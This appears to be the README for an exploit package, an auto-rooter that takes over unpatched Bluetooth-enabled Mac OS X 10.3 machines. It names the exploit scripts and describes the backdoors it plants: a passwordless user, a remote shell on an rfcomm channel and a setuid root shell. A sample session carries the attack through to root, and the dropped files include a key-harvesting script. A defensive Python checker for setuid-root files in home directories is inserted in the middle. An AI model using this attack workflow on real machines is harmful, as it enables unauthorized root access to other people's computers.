GenerationTwo-10.3.tar

If you are trying to exploit 10.4 you need a different tarball!

10.3-plant_input_manager-authopen.pl   is for 10.3.8 and below using a CF_CHARSET_PATH overflow
10.3-plant_input_manager-excploit.pl   will exploit 10.3.9 using a kernel overflow

Auto-rooter for Bluetooth-enabled Macintosh machines that are not
patched against CVE-2005-1333 and CVE-2005-0716.

APPLE-SA-2005-03-21 and APPLE-SA-2005-05-03 address the issues involved 
in the exploitation process. 

This exploit provides a remote shell on rfcomm channel 3. A user named
'pwned mghee', aka 'bluetooth', has been added with no password. You
should find a setuid root shell in your home dir.
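The two artifacts described above (a new passwordless account and a setuid root shell dropped into a home directory) are the things an administrator would look for when checking whether a machine was hit. The following is an added example, not part of the GenerationTwo tarball: it parses the `ls -al` long-listing format shown in the sample run below and flags regular files that are owned by root and carry the setuid bit, and it also includes a live walk of `/Users` for use on an actual host. The sample listing embedded in the script is constructed from the session output on this page plus one benign line; the `/Users` path and the function names are assumptions of this example.

```python
"""Flag setuid-root files in user home directories.

Added example for triage; not code from the GenerationTwo package.
Two entry points:
  find_setuid_root(listing) - offline, parses `ls -al` text
  scan_home_dirs(root)      - live, walks a home-directory tree
"""
import os
import re
import stat
from typing import Dict, List

# Constructed sample: the listing from the sample session on this page,
# plus one benign executable so the filter has something to ignore.
SAMPLE_LISTING = """\
total 48
drwxr-xr-x  4 bluetoot  666      136 15 Aug 00:45 .
drwxrwxr-t  8 root      admin    272 15 Aug 00:26 ..
-rw-------  1 bluetoot  666        5 15 Aug 00:45 .bash_history
-rwsr-xr-x  1 root      666    17000 15 Aug 00:42 shX
-rwxr-xr-x  1 bluetoot  666     1042 15 Aug 00:42 notes.sh
"""

# mode(10 chars, optional '@'/'+' for xattrs or ACLs on OS X), link count,
# owner, group, size, three date/time tokens, then the name (may contain spaces).
# Both "15 Aug 00:42" (OS X) and "Aug 15 00:42" (Linux) are three tokens.
LS_LINE = re.compile(
    r"^(?P<mode>[-dlbcps][rwxsStT-]{9})[@+]?\s+\d+\s+"
    r"(?P<owner>\S+)\s+(?P<group>\S+)\s+(?P<size>\d+)\s+"
    r"\S+\s+\S+\s+\S+\s+(?P<name>.+)$"
)


def parse_ls(listing: str) -> List[Dict[str, str]]:
    """Return one dict per parsable entry; skips 'total N' and junk lines."""
    entries = []
    for line in listing.splitlines():
        m = LS_LINE.match(line)
        if m:
            entries.append(m.groupdict())
    return entries


def is_setuid_root(entry: Dict[str, str]) -> bool:
    """True for a regular file owned by root whose owner-execute slot is 's' or 'S'."""
    mode = entry["mode"]
    return mode[0] == "-" and mode[3] in "sS" and entry["owner"] == "root"


def find_setuid_root(listing: str) -> List[str]:
    """Names of setuid-root regular files in an `ls -al` listing."""
    return [e["name"] for e in parse_ls(listing) if is_setuid_root(e)]


def scan_home_dirs(root: str = "/Users") -> List[str]:
    """Live check on a host: walk home directories, return setuid-root regular files.

    Uses lstat so symlinks are not followed; unreadable paths are skipped.
    """
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if (stat.S_ISREG(st.st_mode)
                    and st.st_mode & stat.S_ISUID
                    and st.st_uid == 0):
                hits.append(path)
    return hits


if __name__ == "__main__":
    # Offline demonstration on the constructed listing; expected: ['shX']
    print(find_setuid_root(SAMPLE_LISTING))
```

On a real host, `scan_home_dirs()` is the function to run (as root, so every home is readable); any hit is worth investigating since a setuid-root binary has no legitimate reason to sit under a user's home directory.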

Here is a sample run against my stock Mac mini with the original install
disk (10.3.7).

kfinisterre@threat:~$ cd GenerationTwo-10.3/
kfinisterre@threat:~/GenerationTwo-10.3$ ./10.3-AutoRoot
00:14:51:5A:3D:99 kf...s
using kf
Connected to 00:14:51:5A:3D:99.
ftp> ftp> ftp> ftp> ftp> ftp> 458 bytes sent
ftp> ftp> ftp> ftp> ftp> ftp> ftp> 173324 bytes sent
ftp> ftp> 2057 bytes sent
ftp> 1464 bytes sent
ftp> 1042 bytes sent
ftp> 17000 bytes sent
ftp> 17000 bytes sent
ftp> 90812 bytes sent
ftp> 2743 bytes sent
ftp> 1658 bytes sent
ftp> 2342 bytes sent
ftp> drwxr-xr-x            Aug 15 00:42 ..
drwxr-xr-x            Aug 15 00:42 501
-rw-r--r--       2057 Aug 15 00:42 authopen-CF_CHARSET.pl
-rw-r--r--       1464 Aug 15 00:42 KeyHarvest.pl
-rw-r--r--       2743 Aug 15 00:42 login.config
-rw-r--r--        640 Aug 15 00:42 mcx_compositor
-rw-r--r--      90812 Aug 15 00:42 mgetty
-rw-r--r--       1658 Aug 15 00:42 mgetty.config
-rw-r--r--       1042 Aug 15 00:42 pwn
-rw-r--r--      17000 Aug 15 00:42 sh
-rw-r--r--      17000 Aug 15 00:42 shX
-rw-r--r--       2342 Aug 15 00:42 ttys
ftp> Disconnected.
Connected to 00:14:51:5A:3D:99.
ftp> Disconnected.

(computer is rebooting) 

kfinisterre@threat:~$ rfcomm connect 0 00:14:51:5A:3D:99 3
Connected /dev/rfcomm0 to 00:14:51:5A:3D:99 on channel 3
Press CTRL-C for hangup

kfinisterre@threat:~$ minicom

Welcome to minicom 2.1

OPTIONS: History Buffer, F-key Macros, Search History Buffer, I18n
Compiled on Nov  5 2005, 15:45:44.

Press CTRL-A Z for help on special keys

k-fs-Computer.local!login: pwned mghee
Password:
Last login: Tue Aug 15 00:45:09 on tty.Blue
Welcome to Darwin!
k-fs-Computer:~ bluetooth$ ls -al
total 48
drwxr-xr-x  4 bluetoot  666      136 15 Aug 00:45 .
drwxrwxr-t  8 root      admin    272 15 Aug 00:26 ..
-rw-------  1 bluetoot  666        5 15 Aug 00:45 .bash_history
-rwsr-xr-x  1 root      666    17000 15 Aug 00:42 shX
k-fs-Computer:~ bluetooth$ ./shX
csh: No entry for terminal type "unknown"
csh: using dumb terminal settings.
[k-fs-Computer:~] bluetoot# id
uid=0(root) gid=0(wheel) groups=0(wheel)